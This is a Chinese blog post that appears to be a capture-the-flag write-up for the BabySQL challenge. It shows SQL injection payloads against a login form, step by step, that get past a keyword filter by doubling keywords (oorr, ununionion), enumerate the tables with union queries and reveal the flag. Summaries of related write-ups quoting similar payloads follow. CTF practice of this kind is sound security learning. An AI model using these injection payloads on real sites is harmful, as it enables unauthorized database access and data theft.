[极客大挑战 2019]BabySQL 1

最新推荐文章于 2023-05-19 21:51:03 发布
最新推荐文章于 2023-05-19 21:51:03 发布
阅读量283 收藏 1
点赞数
文章标签: java 数据库 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xixixihan/article/details/128052730
版权

在这里插入图片描述

?username=1&password=1‘or'1'='1

一、打开,万能密码试一手,发现好像or被过滤了,尝试下去,会发现and,or,select,union,from,where等都被过滤了。
看大佬wp,用双写绕过[极客大挑战 2019]BabySQL 1
tips:双写绕过原理,代码编写过程中,只对黑名单中的内容进行空替换,但只替换一次。

在这里插入图片描述

?username=1' oorr '1'='1'%23&password=1

二、成功绕过,开始常见手段,猜列,猜到4时报错
在这里插入图片描述

三、猜注入点,2,3是
在这里插入图片描述

?username=1'ununionion seselectlect 1,2,3 %23&password=1

四、爆库,库名为geek
五、爆表,注意information_schema.tables里的or也被过滤了,得到两个表b4bsql,geekuser
在这里插入图片描述

?username=1'ununionion seselectlect 1,2,group_concat(table_name) frfromom infoorrmation_schema.tables whwhereere table_schema='geek'%23&password=1

六、先看b4bsql表
在这里插入图片描述
七、看字段值,得到flag
在这里插入图片描述```
Your password is ‘1cl4yi_want_to_play_2077,2sqlsql_injection_is_so_fun,3porndo_you_know_pornhub,4gitgithub_is_different_from_pornhub,5Stopyou_found_flag_so_stop,6badguyi_told_you_to_stop,7hackerhack_by_cl4y,8flagflag{416be82e-0025-4ea6-bf4d-2a50a4a543b2}’
大猫__
关注
[极客挑战 2019]BabySQL 1(双写绕过)
weixin_45253573的博客
12-08 1582
存在sql注入漏洞 username:1’ order by 2# password:1 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ‘der 2#’ and password='1’’ at line 1 or被过滤 username:1’ union select ..
[极客挑战 2019]BabySQL1 详解以及思路(sql报错语句探究和跨库查询)
最新发布
2301_78981190的博客
08-17 157
观察报错信息,发现sql的报错信息有点不一样,确定它已经带入查询了,但报错信息中的or被吞了,所以怀疑是把or给过滤掉了,尝试双写后成功绕过(所以以下sql语句中如果语句报错就尝试双写解决,经过后面测试,过滤掉了or,select,by,union,from,where等)不要执着于错误的库(引以为戒本人在geek库中找了20min,在查询ctf库内容时忘记限定为ctf库导致仍然在geek库中查询,没能找到的悲剧(T▽T) )Flag表里只有flag列,所以跨库查询的语句这么写,成功找到flag。
[极客挑战 2019]BabySQL 1(BUCTF在线评测)
邓霖涛的博客
07-21 529
得到flag{ca17b523-fe92-4451-943d-3f832154b748}注意注入orselectwhereunionfrom等关键字都给过滤了。查询该表信息,注意or给替换的password里面也有or。发现成功了,系统可能就新增了一些sql关键字的过滤。一样的sql注入不行了,感觉or关键字给弄没了。得到id,username,password。发现selectfrom一些关键字没了。得到表名b4bsql,geekuser。打开靶机,一样的sql发现不行了。......
[极客挑战 2019]BabySQL 1 详细题解
偷一个月亮
09-01 6092
过滤 select or and union from http://6d3700e3-2a8a-4291-9f0b-67e729cae0a1.node3.buuoj.cn/check.php?username=1' ununionion selselectect 1,(selselectect group_concat(table_name) frofromm infoorrmation_schema.tables whwhereere table_schema=datab...
【学习笔记 27】 buu [极客挑战 2019]BabySQL
weixin_43553654的博客
07-28 220
0x00 知识点 union injection(联合注入) 双写注入绕过 0x01 知识点详解 1. 什么是union injection(联合注入)? 答:详情请查看我的第23篇学习笔记 2.什么是双写绕过? 答:这里推测是利用replace函数将检索到第一个关键词替换为空格,但是当我们重复书写后就可以绕过。例如:我们可以将union替换为ununionion来进行绕过。 0x02 解题思路 登录网站查看网站 看这个网站有点像之前做的那道lovesql那道题,再加上名字,不用想,肯定是注入了。先
CTF学习笔记——[极客挑战 2019]BabySQL
Obs_cure的博客
02-09 1462
一、[极客挑战 2019]BabySQL 1.题目 2.解题步骤 一看就知道是之前一个系列的题,可惜并不耽误我不会做… 在尝试的时候报错是看不懂的,这里简单记述一下心路历程。SQL注入的题目自然是1' or 1=1 # 结果很奇怪 这里在看过WP才知道是把or过滤掉了才有这样的回显。很明显我注入的东西和回显出来的东西不一样。那么是什么过滤呢,从这样的回显来看,是把or替换成了空白。师傅们的做法是双写。就是改成oorr。匹配的时候会把中间的替换成空 然后外面的再组成or。双写绕过学会了) 接下来就是常
[极客挑战 2019]BabySQL1
qq_51902218的博客
08-10 270
1.判断注入类型 1' 发现报错 原因:select name.passwd from users where username=' 1' ' and password=‘ ’; 有语法错误 所以可以判断为字符型注入
BUUCTF-[极客挑战 2019]BabySQL1
Monica的博客
10-02 1175
目录 题目: 分析: 题目: 分析: 先测试是什么闭合 near ' ' 123' 'and password=' 'amdin' ' ' at line 1 通过拆分可以看出用户名和密码都是单引号闭合 猜测后台语句为: ' select xxx from xxx where username='' and password='' ' 测试有几列: 发现有过滤。 union 和select也被过滤了,试试...
[极客挑战 2019]BabySQL1 思路细致讲解
hac1ker123的博客
05-19 900
[极客挑战 2019]BabySQL1 思路细致讲解
BUUCTF:[极客挑战 2019]BabySQL 1
羽的博客
07-22 288
输入: 1' 1 判断是单引号注入 输入: 1' order by 1# 1 发现过滤了or,by 尝试双写注入 输入: 1' oorrder bbyy 4# 1 是四列 输入: 1' ununionion seselectlect 1,database(),3# 1 输入: 1' ununionion seselectlect 1,2,group_concat(table_name) ffromrom infoorrmation_schema...
BUUCTF [极客挑战 2019]BabySQL 1
Seizerz的博客
04-03 449
打开就是个登录框,这道题是注入,那无疑就是user或者password处了 输入数据,
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值